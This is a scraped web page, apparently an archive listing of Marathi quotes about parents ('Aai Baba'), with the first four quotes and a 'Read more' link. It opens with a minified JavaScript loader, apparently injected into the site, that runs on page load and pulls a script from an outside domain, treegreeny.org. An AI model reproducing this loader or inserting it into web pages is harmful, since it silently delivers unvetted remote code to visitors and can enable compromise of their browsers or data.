;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); aai baba quotes in marathi copy paste Archives - EDIIFY

20 Aai Baba Quotes In marathi

  1. ❤️आईच्या ममतेचा आणि बापाच्या  क्षमतेचा अंदाज कधीच लागत नाही.❤️ 2. ❤️विश्वास बापावर ठेवा आणि  प्रेम आईवर करा ना कधी  धोका भेटेल ना कधी मन तुटेल.❤️ 3. ❤️या जगात आई वडिल सोडले ना  तर आपली कदर कोणालाच नसते  हे मरेपर्यंत विसरू नका.❤️ 4. ❤️ज्याला आईबापाच्या कष्टाची  जाणीव असते ना तो कधीच  वाईट मार्गाला जात … Read more